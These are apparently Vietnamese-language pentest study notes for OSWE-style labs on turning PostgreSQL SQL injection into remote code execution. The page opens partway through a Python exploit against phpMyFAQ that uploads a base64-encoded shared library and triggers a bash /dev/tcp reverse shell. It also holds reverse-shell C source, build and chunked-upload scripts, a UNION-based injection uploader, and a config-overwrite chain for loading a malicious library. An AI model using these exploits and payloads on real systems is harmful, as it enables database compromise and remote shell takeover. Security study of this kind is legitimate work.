"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAwBAAAAAAAAABAAAAAAAAAHsAAAAAAAAADAAAAAAAAAAAEAAAAAAAAA0AAAAAAAAASBEAAAAAAAAZAAAAAAAAABA+AAAAAAAAGwAAAAAAAAAIAAAAAAAAABoAAAAAAAAAGD4AAAAAAAAcAAAAAAAAAAgAAAAAAAAA9f7/bwAAAABgAgAAAAAAAAUAAAAAAAAAaAMAAAAAAAAGAAAAAAAAAJACAAAAAAAACgAAAAAAAACRAAAAAAAAAAsAAAAAAAAAGAAAAAAAAAADAAAAAAAAAABAAAAAAAAAAgAAAAAAAAAYAAAAAAAAABQAAAAAAAAABwAAAAAAAAAXAAAAAAAAANgEAAAAAAAABwAAAAAAAAAwBAAAAAAAAAgAAAAAAAAAqAAAAAAAAAAJAAAAAAAAABgAAAAAAAAA/v//bwAAAAAQBAAAAAAAAP///28AAAAAAQAAAAAAAADw//9vAAAAAPoDAAAAAAAA+f//bwAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=" chunk_7 = "ID4AAAAAAAAAAAAAAAAAAAAAAAAAAAAANhAAAAAAAAAgQAAAAAAAAEdDQzogKERlYmlhbiA4LjMuMC02KSA4LjMuMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAQA4AgAAAAAAAAAAAAAAAAAAAAAAAAMAAgBgAgAAAAAAAAAAAAAAAAAAAAAAAAMAAwCQAgAAAAAAAAAAAAAAAAAAAAAAAAMABABoAwAAAAAAAAAAAAAAAAAAAAAAAAMABQD6AwAAAAAAAAAAAAAAAAAAAAAAAAMABgAQBAAAAAAAAAAAAAAAAAAAAAAAAAMABwAwBAAAAAAAAAAAAAAAAAAAAAAAAAMACADYBAAAAAAAAAAAAAAAAAAAAAAAAAMACQAAEAAAAAAAAAAAAAAAAAAAAAAAAAMACgAgEAAAAAAAAAAAAAAAAAAAAAAAAAMACwBAEAAAAAAAAAAAAAAAAAAAAAAAAAMADABQEAAAAAAAAAAAAAAAAAAAAAAAAAMADQBIEQAAAAAAAAAAAAAAAAAAAAAAAAMADgAAIAAAAAAAAAAAAAAAAAAAAAAAAAMADwAgIAAAAAAAAAAAAAAAAAAAAAAAAAMAEABYIAAAAAAAAAAAAAAAAAAAAAAAAAMAEQAQPgAAAAAAAAAAAAAAAAAAAAAAAAMAEgAYPgAAAAAAAAAAAAAAAAAAAAAAAAMAEwAgPgAAAAAAAAAAAAAAAAAAAAAAAAMAFADgPwAAAAAAAAAAAAAAAAAAAAAAAAMAFQAAQAAAAAAAAAAAAAAAAAAAAAAAAAMAFgAgQAAAAAAAAAAAAAAAAAAAAAAAAAMAFwAoQAAAAAAAAAAAAAAAAAAAAAAAAAMAGAAAAAAAAAAAAAAAAAAAAAAAAQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAADAAAAAIADABQEAAAAAAAAAAAAAAAAAAADgAAAAIADACAEAAAAAAAAAAAAAAAAAAAIQAAAAIADADAEAAAAAAAAAAAAAAAAAAANwAAAAEAFwAoQAAAAAAAAAEAAAAAAAAARgAAAAEAEgAYPgAAAAAAAAAAAAAAAAAAbQAAAAIADAAAEQAAAAAAAAAAAAAAAAAAeQAAAAEAEQAQPgAAAAAAAAAAAAAAAAAAmAAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAogAAAAEADgAAIAAAAAAAABwAAAAAAAAAtQAAAAEADgAcIAAAAAAAAAQAAAAAAAAAAQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAwwAAAAEAEAAQIQAAAAAAAAAAAAAAAAAAAAAAAAQA8f8AAAAAAAAAAAAAAAAAAAAA0QAAAAIADQBIEQAAAAAAAAAAAAAAAAAA1wAAAAEAFgAgQAAAAAAAAAAAAAAAAAAA5AAAAAEAEwAgPgAAAAAAAAAAAAAAAAAA7QAAAAAADwAgIAAAAAAAAAAAAAAAAAAAAAEAAAEAFgAoQAAAAAAAAAAAAAAAAAAADAEAAAEAFQAAQAAAAAAAAAAAAAAAAAAAIgEAAAIACQAAEAAAAAAAAAAAAAAAAAAAKAEAABIADAAFEQAAAAAAAA0AAAAAAAAANgEAACAAAAAAAAAAAAAAAAAAAAAAAAAAUgEAABIAAAAAAAAAAAAAAAAAAAAAAAAAZgEAACAAAAAAAAAAAAAAAAAAAAAAAAAAfgEAABIADAAfEQAAAAAAACgAAAAAAAAAdQEAABIADAASEQAAAAAAAA0AAAAAAAAAhgEAACAAAAAAAAAAAAAAAAAAAAAAAAAAoAEAACIAAAAAAAAAAAAAAAAAAAAAAAAAAGNydHN0dWZmLmMAZGVyZWdpc3Rlcl90bV9jbG9uZXMAX19kb19nbG9iYWxfZHRvcnNfYXV4AGNvbXBsZXRlZC43MzI1AF9fZG9fZ2xvYmFsX2R0b3JzX2F1eF9maW5pX2FycmF5X2VudHJ5AGZyYW1lX2R1bW15AF9fZnJhbWVfZHVtbXlfaW5pdF9hcnJheV9lbnRyeQBwZ19leGVjLmMAUGdfbWFnaWNfZGF0YS40OTAyAG15X2ZpbmZvLjQ5MTEAX19GUkFNRV9FTkRfXwBfZmluaQBfX2Rzb19oYW5kbGUAX0RZTkFNSUMAX19HTlVfRUhfRlJBTUVfSERSAF9fVE1DX0VORF9fAF9HTE9CQUxfT0ZGU0VUX1RBQkxFXwBfaW5pdABQZ19tYWdpY19mdW5jAF9JVE1fZGVyZWdpc3RlclRNQ2xvbmVUYWJsZQBzeXN0ZW1AQEdMSUJDXzIuMi41AF9fZ21vbl9zdGFydF9fAHBnX2ZpbmZvX3BnX2V4ZWMAX0lUTV9yZWdpc3RlclRNQ2xvbmVUYWJsZQBfX2N4YV9maW5hbGl6ZUBAR0xJQkNfMi4yLjUAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALm5vdGUuZ251LmJ1aWxkLWlkAC5nbnUuaGFzaAAuZHluc3ltAC5keW5zdHIALmdudS52ZXJzaW9uAC5nbnUudmVyc2lvbl9yAC5yZWxhLmR5bgAucmVsYS5wbHQALmluaXQALnBsdC5nb3QALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWVfaGRyAC5laF9mcmFtZQAuaW5pdF9hcnJheQAuZmluaV9hcnJheQAuZHluYW1pYwAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb20=" chunk_8 = "bWVudAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAcAAAACAAAAAAAAADgCAAAAAAAAOAIAAAAAAAAkAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAC4AAAD2//9vAgAAAAAAAABgAgAAAAAAAGACAAAAAAAAMAAAAAAAAAADAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAA4AAAACwAAAAIAAAAAAAAAkAIAAAAAAACQAgAAAAAAANgAAAAAAAAABAAAAAEAAAAIAAAAAAAAABgAAAAAAAAAQAAAAAMAAAACAAAAAAAAAGgDAAAAAAAAaAMAAAAAAACRAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAEgAAAD///9vAgAAAAAAAAD6AwAAAAAAAPoDAAAAAAAAEgAAAAAAAAADAAAAAAAAAAIAAAAAAAAAAgAAAAAAAABVAAAA/v//bwIAAAAAAAAAEAQAAAAAAAAQBAAAAAAAACAAAAAAAAAABAAAAAEAAAAIAAAAAAAAAAAAAAAAAAAAZAAAAAQAAAACAAAAAAAAADAEAAAAAAAAMAQAAAAAAACoAAAAAAAAAAMAAAAAAAAACAAAAAAAAAAYAAAAAAAAAG4AAAAEAAAAQgAAAAAAAADYBAAAAAAAANgEAAAAAAAAGAAAAAAAAAADAAAAFQAAAAgAAAAAAAAAGAAAAAAAAAB4AAAAAQAAAAYAAAAAAAAAABAAAAAAAAAAEAAAAAAAABcAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAcwAAAAEAAAAGAAAAAAAAACAQAAAAAAAAIBAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAAH4AAAABAAAABgAAAAAAAABAEAAAAAAAAEAQAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAACHAAAAAQAAAAYAAAAAAAAAUBAAAAAAAABQEAAAAAAAAPcAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAjQAAAAEAAAAGAAAAAAAAAEgRAAAAAAAASBEAAAAAAAAJAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAJMAAAABAAAAAgAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAIAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAACbAAAAAQAAAAIAAAAAAAAAICAAAAAAAAAgIAAAAAAAADQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAqQAAAAEAAAACAAAAAAAAAFggAAAAAAAAWCAAAAAAAAC8AAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAALMAAAAOAAAAAwAAAAAAAAAQPgAAAAAAABAuAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAAC/AAAADwAAAAMAAAAAAAAAGD4AAAAAAAAYLgAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAywAAAAYAAAADAAAAAAAAACA+AAAAAAAAIC4AAAAAAADAAQAAAAAAAAQAAAAAAAAACAAAAAAAAAAQAAAAAAAAAIIAAAABAAAAAwAAAAAAAADgPwAAAAAAAOAvAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADUAAAAAQAAAAMAAAAAAAAAAEAAAAAAAAAAMAAAAAAAACAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA3QAAAAEAAAADAAAAAAAAACBAAAAAAAAAIDAAAAAAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAOMAAAAIAAAAAwAAAAAAAAAoQAAAAAAAACgwAAAAAAAACAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAADoAAAAAQAAADAAAAAAAAAAAAAAAAAAAAAoMAAAAAAAABwAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAIAAAAAAAAAAAAAAAAAAAAAAAAASDAAAAAAAAAQBQAAAAAAABoAAAAuAAAACAAAAAAAAAAYAAAAAAAAAAkAAAADAAAAAAAAAAAAAAAAAAAAAAAAAFg1AAAAAAAAvAEAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAARAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAUNwAAAAAAAPEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA" insert_template = "INSERT INTO pg_largeobject (loid, pageno, data) VALUES ({}, {}, decode('{}', 'base64'));" payload += insert_template.format(loid, 0, chunk_1) payload += insert_template.format(loid, 1, chunk_2) payload += insert_template.format(loid, 2, chunk_3) payload += insert_template.format(loid, 3, chunk_4) payload += insert_template.format(loid, 4, chunk_5) payload += insert_template.format(loid, 5, chunk_6) payload += insert_template.format(loid, 6, chunk_7) payload += insert_template.format(loid, 7, chunk_8) payload += "select lo_export({}, '{}');".format(loid, extension_name) # UDF Extension is now exported to the file system, load it and open up a reverse shell payload += "CREATE FUNCTION sys(cstring) RETURNS int AS '{}', 'pg_exec' LANGUAGE C STRICT;".format( extension_name) payload += 'SELECT sys(\'bash -c "bash -i >& /dev/tcp/{}/{} 0>&1"\');'.format( listener_host, listener_port) payload += "DROP FUNCTION IF EXISTS sys(cstring) -- -" endpoint = "{}/ajaxservice.php?action=savefaq".format(base_url) cookies = { "PHPSESSID": session_id, "pmf_sid": "1", } headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Connection": "close" } pwn = { "lang": payload, # Injection payload goes here "rubrik": "1", "answer": "123", "name": "oldie", "question": "123", "keywords": "12331", "openQuestionID": '', "email": "blah@gmail.com", "contentlink": "http://mvlcw0p4vg6j4e2q50ayzit5yw4nsfg4.oastify.com", } requests.post(endpoint, headers=headers, cookies=cookies, data=pwn) # Example usage: # python3 shell.py http://172-105-72-245.ip.linodeusercontent.com/phpmyfaq 172.105.72.245 4242 6tqnncs8bqpai22vkj2g17o828 if __name__ == '__main__': if len(sys.argv) != 5: print("usage: %s TARGET LHOST LPORT" % sys.argv[0]) sys.exit(-1) target = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] sess_id = sys.argv[4] reverse_shell_via_large_object( base_url=target, listener_host=lhost, listener_port=lport, session_id=sess_id) ``` file so kết nối socket ```python= #include #include #include #include #include #include #include "postgres.h" #include "fmgr.h" #ifdef PG_MODULE_MAGIC PG_MODULE_MAGIC; #endif void _init() { /* code taken from https://www.revshells.com/ */ int port = 8888; struct sockaddr_in revsockaddr; int sockt = socket(AF_INET, SOCK_STREAM, 0); revsockaddr.sin_family = AF_INET; revsockaddr.sin_port = htons(port); revsockaddr.sin_addr.s_addr = inet_addr("172.23.16.1"); connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr)); dup2(sockt, 0); dup2(sockt, 1); dup2(sockt, 2); char * const argv[] = {"/bin/bash", NULL}; execve("/bin/bash", argv, NULL); } ``` ![image](https://hackmd.io/_uploads/HJT_qgQaZg.png) ``` gcc -I$(pg_config --includedir-server) -shared -fPIC -nostartfiles -o payload.so payload.c ``` ``` FILE="./payload.so" OUTPUT_DIR="./payload_chunks" CHUNK_SIZE=2048 mkdir -p "$OUTPUT_DIR" split -b $CHUNK_SIZE "$FILE" "$OUTPUT_DIR/" OFFSET=0 for f in $OUTPUT_DIR/*; do xxd -p -c 999999 "$f" > "$OUTPUT_DIR/hex_$OFFSET" rm "$f" OFFSET=$(($OFFSET + $CHUNK_SIZE)) done ``` ``` import requests import sys,os URL = "http://localhost:5000/user" # URL of the vulnerable application DIR = "E:/Filelocation/Information-Security/Lab/SQLi/Postgre-SQL/Postgre_SQL/payload_chunks" # Directory containing the files to file .so decode hex OID = 8382 # OID of the large object in PostgreSQL CHUNK_SIZE = 2048 # Size of each chunk in bytes LOOP = 1 # Number of chunks for filename in os.listdir(DIR): file_path = os.path.join(DIR, filename) with open(file_path, 'r') as file: if file.name.endswith("_0"): # Intial, we need to create the large object in PostgreSQL with open(file_path, 'r') as file: data = file.read() payload = {"name": f"a' union select 1333,CAST((select lo_from_bytea({OID},decode('{data}','hex'))) as text),1-- -"} res = requests.get(URL, params=payload) print(payload) print("\n") else: with open(file_path, 'r') as file: # Continue to write the large object in PostgreSQL data = file.read() payload = {"name": f"a' union select 1333,CAST((select lo_put({OID},{CHUNK_SIZE*LOOP},decode('{data}','hex'))) as text),1-- -"} res = requests.get(URL, params=payload) print(payload) print("\n") ``` Dưới đây là **toàn bộ flow tấn công** trong bài *“PostgreSQL SELECT-only RCE”* (adeadfed), mình tóm lại theo đúng logic để bạn dễ dùng khi làm OSWE / lab. --- # 🧠 Tổng quan ý tưởng Bài này giải quyết case khó: * ❌ Không dùng stacked query (`; SELECT ...`) * ❌ Chỉ inject được **SELECT** * ✅ Nhưng vẫn đạt **RCE** 👉 Ý tưởng chính: 1. **Đọc config PostgreSQL** 2. **Ghi đè config → preload thư viện độc** 3. **Upload file `.so`** 4. **Reload config → trigger RCE** 👉 Điểm mấu chốt: * Dùng các hàm: * `lo_import` (read file) * `lo_export` (write file) * `lo_from_bytea`, `lo_put` (ghi binary) * Tất cả đều chạy được **trong SELECT** ([@adeadfed][1]) --- # ⚔️ Step 1: Đọc `postgresql.conf` Mục tiêu: lấy config hiện tại để chỉnh sửa mà không làm hỏng hệ thống. ### Flow: ```sql -- 1. Lấy path config SELECT sourcefile FROM pg_file_settings; -- 2. Load file vào large object SELECT lo_import('/var/lib/postgresql/data/postgresql.conf', 31337); -- 3. Đọc nội dung file SELECT lo_get(31337); ``` 👉 Output: * trả về hex → decode ra text config ([@adeadfed][1]) --- # ⚔️ Step 2: Ghi đè config (quan trọng nhất) Mục tiêu: ép PostgreSQL load file `.so` của attacker. ### Sửa config: ```conf dynamic_library_path = '/tmp:$libdir' session_preload_libraries = 'payload.so' ``` 👉 Ý nghĩa: * `/tmp` = nơi attacker có thể ghi file * `session_preload_libraries` → load `.so` mỗi khi connect DB --- ### Ghi file bằng SQL: ```sql -- 1. Encode config (base64) SELECT lo_from_bytea(133337, decode('BASE64_CONFIG', 'base64')); -- 2. Ghi ra disk (overwrite) SELECT lo_export(133337, '/var/lib/postgresql/data/postgresql.conf'); ``` 👉 Lúc này config đã bị backdoor ([@adeadfed][1]) --- # ⚔️ Step 3: Upload payload `.so` Mục tiêu: đưa file thực thi lên server. --- ### 3.1 Kiểm tra version ```sql SELECT version(); ``` 👉 để compile đúng version PostgreSQL --- ### 3.2 Upload file `.so` (chunked) Do binary lớn → phải chia nhỏ: ```sql -- tạo object SELECT lo_from_bytea(133338, decode('chunk1', 'base64')); -- ghi thêm các chunk SELECT lo_put(133338, offset, decode('chunkN', 'base64')); -- ghi ra file SELECT lo_export(133338, '/tmp/payload.so'); ``` 👉 `/tmp/payload.so` chính là backdoor ([@adeadfed][1]) --- ### Payload `.so` làm gì? * Khi load sẽ chạy `_init()` * Thường là: * reverse shell * command execution --- # ⚔️ Step 4: Reload config → trigger RCE ```sql SELECT pg_reload_conf(); ``` 👉 Sau đó: * Khi có connection mới → PostgreSQL load `.so` * `_init()` chạy → RCE 👉 Kết quả: ```bash uid=999(postgres) ``` ([@adeadfed][1]) --- # 🔥 Tóm tắt attack chain (quan trọng) ```text SQLi (SELECT only) ↓ Read postgresql.conf ↓ Overwrite config (preload .so) ↓ Upload payload.so ↓ Reload config ↓ New DB connection ↓ RCE ``` --- # ⚠️ Điều kiện để exploit thành công * Có quyền: * `lo_import`, `lo_export` * hoặc gần DBA * Có quyền ghi file hệ thống * DB chạy dưới user có quyền write config 👉 Nói ngắn gọn: > **phải có privilege cao (DBA hoặc tương đương)** --- # 💡 Insight quan trọng (OSWE hay hỏi) ### 1. Vì sao bypass được "SELECT only"? * Không cần stacked query * Tất cả logic nằm trong **nested SELECT** --- ### 2. Điểm mạnh của kỹ thuật này * Không cần: * `COPY ... PROGRAM` * `xp_cmdshell` * Pure PostgreSQL abuse --- ### 3. Đây là kiểu gì? 👉 **File write + DLL hijacking (PostgreSQL style)** --- Bạn nên nhớ pattern này: * `lo_import` → read file * `lo_export` → write file * `pg_largeobject` → storage trung gian * config injection → persistence + RCE So sánh 3 kỹ thuật RCE trong PostgreSQL này rất “trúng tủ” OSWE vì chúng đại diện cho **3 mindset khác nhau**: 👉 *OS command trực tiếp* vs *language abuse* vs *config hijack + file write* --- # ⚔️ 1. `COPY TO PROGRAM` RCE ## 🧠 Ý tưởng Chạy command OS trực tiếp qua PostgreSQL ```sql COPY (SELECT '') TO PROGRAM 'id'; ``` --- ## ⚙️ Cách hoạt động * PostgreSQL spawn process trên OS * Command chạy dưới user `postgres` --- ## ✅ Ưu điểm * RCE **ngay lập tức** * Payload cực ngắn * Không cần upload file --- ## ❌ Nhược điểm * ❗ Cần quyền cao: * superuser * ❗ Thường bị disable * ❗ Cần stacked query (`;`) --- ## 🔥 Độ thực chiến * ⭐⭐⭐☆☆ (ít gặp trong exam vì quá “thẳng”) --- # ⚔️ 2. `plpython` RCE ## 🧠 Ý tưởng Dùng Python interpreter bên trong PostgreSQL ```sql CREATE FUNCTION pwn() RETURNS void AS $$ import os os.system("id") $$ LANGUAGE plpythonu; SELECT pwn(); ``` --- ## ⚙️ Cách hoạt động * PostgreSQL hỗ trợ procedural language * `plpythonu` = untrusted → chạy OS command --- ## ✅ Ưu điểm * Linh hoạt (viết code Python) * Không cần file `.so` --- ## ❌ Nhược điểm * ❗ Cần: * `CREATE FUNCTION` * extension `plpythonu` phải tồn tại * ❗ Thường bị disable * ❗ Cần stacked query --- ## 🔥 Độ thực chiến * ⭐⭐☆☆☆ (CTF có, thực tế ít) --- # ⚔️ 3. SELECT-only RCE (adeadfed) ## 🧠 Ý tưởng Không chạy command trực tiếp → mà: ```text viết file + hijack config → PostgreSQL tự chạy payload ``` --- ## ⚙️ Cách hoạt động 1. `lo_import` → đọc file 2. `lo_export` → ghi file 3. overwrite config 4. upload `.so` 5. preload → auto execute --- ## ✅ Ưu điểm * ✔️ Không cần stacked query * ✔️ Chỉ cần **SELECT** * ✔️ Bypass nhiều filter * ✔️ Rất stealth (giống persistence) --- ## ❌ Nhược điểm * ❗ Phức tạp (nhiều bước) * ❗ cần quyền file write * ❗ cần hiểu internal PostgreSQL --- ## 🔥 Độ thực chiến * ⭐⭐⭐⭐⭐ --- # ⚖️ So sánh trực tiếp | Kỹ thuật | Quyền cần | Cần `;` | Độ khó | Độ stealth | Thực chiến | | --------------- | --------------- | ------- | ------ | ---------- | ---------- | | COPY TO PROGRAM | superuser | ✅ | ⭐ | ❌ | ⭐⭐⭐ | | plpython | create function | ✅ | ⭐⭐ | ❌ | ⭐⭐ | | SELECT-only RCE | high (lo_*) | ❌ | ⭐⭐⭐⭐ | ✅ | ⭐⭐⭐⭐⭐ | --- # các bước RCE trên linux **Authors**: < [nixawk](https://github.com/nixawk) > ---- #POSTGRESQL HACK# ---- ##DATABASE CONNECTION## Please connect to **postgresql** database, ``` lab:~/ $ psql -h 127.0.0.1 -U postgres -W ``` ---- ##DATABASE COMMANDS## ``` postgres=# help You are using psql, the command-line interface to PostgreSQL. Type: \copyright for distribution terms \h for help with SQL commands \? for help with psql commands \g or terminate with semicolon to execute query \q to quit ``` ``` postgres=# \h Available help: ABORT CREATE FOREIGN DATA WRAPPER DROP SEQUENCE ALTER AGGREGATE CREATE FOREIGN TABLE DROP SERVER ALTER COLLATION CREATE FUNCTION DROP TABLE ALTER CONVERSION CREATE GROUP DROP TABLESPACE ALTER DATABASE CREATE INDEX DROP TEXT SEARCH CONFIGURATION ALTER DEFAULT PRIVILEGES CREATE LANGUAGE DROP TEXT SEARCH DICTIONARY ALTER DOMAIN CREATE MATERIALIZED VIEW DROP TEXT SEARCH PARSER ALTER EVENT TRIGGER CREATE OPERATOR DROP TEXT SEARCH TEMPLATE ALTER EXTENSION CREATE OPERATOR CLASS DROP TRIGGER ALTER FOREIGN DATA WRAPPER CREATE OPERATOR FAMILY DROP TYPE ALTER FOREIGN TABLE CREATE ROLE DROP USER ALTER FUNCTION CREATE RULE DROP USER MAPPING ALTER GROUP CREATE SCHEMA DROP VIEW ALTER INDEX CREATE SEQUENCE END ALTER LANGUAGE CREATE SERVER EXECUTE ALTER LARGE OBJECT CREATE TABLE EXPLAIN ALTER MATERIALIZED VIEW CREATE TABLE AS FETCH ALTER OPERATOR CREATE TABLESPACE GRANT ALTER OPERATOR CLASS CREATE TEXT SEARCH CONFIGURATION INSERT ALTER OPERATOR FAMILY CREATE TEXT SEARCH DICTIONARY LISTEN ALTER ROLE CREATE TEXT SEARCH PARSER LOAD ALTER RULE CREATE TEXT SEARCH TEMPLATE LOCK ALTER SCHEMA CREATE TRIGGER MOVE ALTER SEQUENCE CREATE TYPE NOTIFY ALTER SERVER CREATE USER PREPARE ALTER SYSTEM CREATE USER MAPPING PREPARE TRANSACTION ALTER TABLE CREATE VIEW REASSIGN OWNED ALTER TABLESPACE DEALLOCATE REFRESH MATERIALIZED VIEW ALTER TEXT SEARCH CONFIGURATION DECLARE REINDEX ALTER TEXT SEARCH DICTIONARY DELETE RELEASE SAVEPOINT ALTER TEXT SEARCH PARSER DISCARD RESET ALTER TEXT SEARCH TEMPLATE DO REVOKE ALTER TRIGGER DROP AGGREGATE ROLLBACK ALTER TYPE DROP CAST ROLLBACK PREPARED ALTER USER DROP COLLATION ROLLBACK TO SAVEPOINT ALTER USER MAPPING DROP CONVERSION SAVEPOINT ALTER VIEW DROP DATABASE SECURITY LABEL ANALYZE DROP DOMAIN SELECT BEGIN DROP EVENT TRIGGER SELECT INTO CHECKPOINT DROP EXTENSION SET CLOSE DROP FOREIGN DATA WRAPPER SET CONSTRAINTS CLUSTER DROP FOREIGN TABLE SET ROLE COMMENT DROP FUNCTION SET SESSION AUTHORIZATION COMMIT DROP GROUP SET TRANSACTION COMMIT PREPARED DROP INDEX SHOW COPY DROP LANGUAGE START TRANSACTION CREATE AGGREGATE DROP MATERIALIZED VIEW TABLE CREATE CAST DROP OPERATOR TRUNCATE CREATE COLLATION DROP OPERATOR CLASS UNLISTEN CREATE CONVERSION DROP OPERATOR FAMILY UPDATE CREATE DATABASE DROP OWNED VACUUM CREATE DOMAIN DROP ROLE VALUES CREATE EVENT TRIGGER DROP RULE WITH CREATE EXTENSION DROP SCHEMA ``` ``` postgres=# \? General \copyright show PostgreSQL usage and distribution terms \g [FILE] or ; execute query (and send results to file or |pipe) \gset [PREFIX] execute query and store results in psql variables \h [NAME] help on syntax of SQL commands, * for all commands \q quit psql \watch [SEC] execute query every SEC seconds Query Buffer \e [FILE] [LINE] edit the query buffer (or file) with external editor \ef [FUNCNAME [LINE]] edit function definition with external editor \p show the contents of the query buffer \r reset (clear) the query buffer \s [FILE] display history or save it to file \w FILE write query buffer to file Input/Output \copy ... perform 